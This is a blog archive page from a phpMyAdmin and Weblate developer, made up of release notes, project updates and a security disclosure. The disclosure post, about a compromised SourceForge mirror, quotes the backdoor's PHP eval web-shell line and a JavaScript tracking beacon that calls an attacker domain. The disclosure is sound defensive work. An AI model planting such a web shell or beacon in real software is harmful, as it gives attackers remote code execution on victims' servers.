Michal Čihař - Archives

Think twice before making your private data public

Data, once put on the internet, are quite hard to delete. You can most likely delete (or ask for deleting) them from place where it has been originally distributed, but you can be never sure where else it has appeared.

Recently, I've seen several requests to remove some data from Gammu testsuite. This testsuite was created using public data available in our bug tracker, simply to be able to verify that we won't break stuff which was earlier fixed.

It turns out that some people did make public some very private stuff, which was included in the testsuite in the end. None of the developers had clue about content of these messages, being in language which nobody of us understands (and being too lazy to run them through Google translator to understand them).

Of course we've removed the data on request, but it's probably already copied in dozen other places on the internet...

Compromised SourceForge mirror

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

Enca 1.14

Seems I've forgotten to announce Enca 1.13 here, but I won't do the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. It's code is currently available at Gitorious.

The full changes for 1.14 release are short:

  • Allow standard names for belarusian and slovenian languages, thanks to Branislav Geržo for suggestion.
  • Reset strictness when check buffer less than file size, thanks to Sam Liao.
  • Fixed typos in man page, thanks to A. Costa.

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from http://cihar.com/software/enca/.

Weblate 1.2

Quite on schedule, Weblate 1.2 has been released today. It comes with lot of improvements, especially for project admins, handling of po files and improved performance.

Full list of changes for 1.2:

  • Weblate now uses South for database migration, please check upgrade instructions if you are upgrading.
  • Fixed minor issues with linked git repos.
  • New introduction page for engaging people with translating using Weblate.
  • Added widgets which can be used for promoting translation projects.
  • Added option to reset repository to origin (for privileged users).
  • Project or subproject can now be locked for translations.
  • Possibility to disable some translations.
  • Configurable options for adding new translations.
  • Configuration of git commits per project.
  • Simple antispam protection.
  • Better layout of main page.
  • Support for automatically pushing changes on every commit.
  • Support for email notifications of translators.
  • List only used languages in preferences.
  • Improved handling of not known languages when importing project.
  • Support for locking translation by translator.
  • Optionally maintain Language-Team header in po file.
  • Include some statistics in about page.
  • Supports (and requires) django-registration 0.8.
  • Caching of counted units with failing checks.
  • Checking of requirements during setup.
  • Documentation improvements.

You can find more information about Weblate on it's website, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Ready to run appliances can be found in SUSE Studio Gallery.

Weblate is also being used https://l10n.cihar.com/ as official translating service for phpMyAdmin, Gammu, Weblate itself and others.

If you are free software project which would like to use Weblate, I'm happy to help you with set up or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Update: Weblate appliace has been updated to 1.2 as well.

Ukolovnik 1.4

Great effort of new translators finally forced me to release Ukolovnik 1.4. There are only minor bug fixes besides translations updates.

Full list of changes:

  • New Spanish translation thanks to Matías Bellone.
  • New Portuguese translation thanks to Everton R.
  • Mew Chinese translation thanks to Siramizu.
  • New Danish translation thanks to Aputsiaq Niels Janussen.
  • Make it work without locales at all.

PS: I don't plan any further development of this tool, in fact I have not touched it in last year and I don't expect this to change.

Weblate in numbers

About month ago, I wrote that there were over 20000 translations done using Weblate in three months. It looks like I was too pessimistic with future as in slightly more than month l10n.cihar.com has reached 30000 translations.

This is quite great achievement and shows big user base. Especially together with rising number of third-party installations of Weblate (still some of the big ones do not want to be mentioned).

On the other side, there have already been around 100 issues open, out of which most were fixed (1.2 release already includes 30 fixed issues). Still I'm sure there is lot of place for improvements :-).

Anyway if you are looking for more numbers, you can find them on Ohloh :-).

Mailing list for Weblate

More and more people seem to be interested in Weblate and it is becoming less and less comfortable to handle all this communication privately in my mailbox.

That's why I've decided to open up mailing list for Weblate. It is now available at weblate@lists.cihar.com, you can subscribe at https://lists.cihar.com/cgi-bin/mailman/listinfo/weblate (request to add this list to Gmane is pending).

I hope this will attract more interested people and open up wider discussion about some features.

PS: Now there is also #weblate on freenode if you are interested in chatting about Weblate.

Weblate hacking #5

Last day of Hackweek VIII is over and I think Weblate is pretty much ready for 1.2 release.

Today I continued to analyzing performance and did few optimizations of some frequently used code paths. There is still lot of area for improvement, but I think Weblate is now fast enough for daily usage on even quite big projects.

Rest of the day was spend by looking at various questions which people have asked me and distilling that into documentation. The most extended part were frequently asked questions, which now includes some hints for setup.

Of course the demo server is running latest and greatest git version, I will probably push it soon to http://l10n.cihar.com/ as well.

Weblate hacking #4

Fourth day of Hackweek VIII was for me again mostly spent on Weblate. This time there are no new nice features, but rather general improvements to the code.

First task was to add support for django-registration 0.8. Originally my plan was to support both 0.7 and 0.8, but that proven to be too complicated so Weblate now requires 0.8, which brings quite a lot of differences in API.

Later I've installed django-debug-toolbar and looked at some bottlenecks in some hot paths. This resulted in few optimizations of translations merging and new caching for translation stats. This turned out to be too expensive for bigger translations and caching these can save few seconds on page load.

I will probably focus more on performance tuning tomorrow as I don't plan to add any new features to 1.2 release.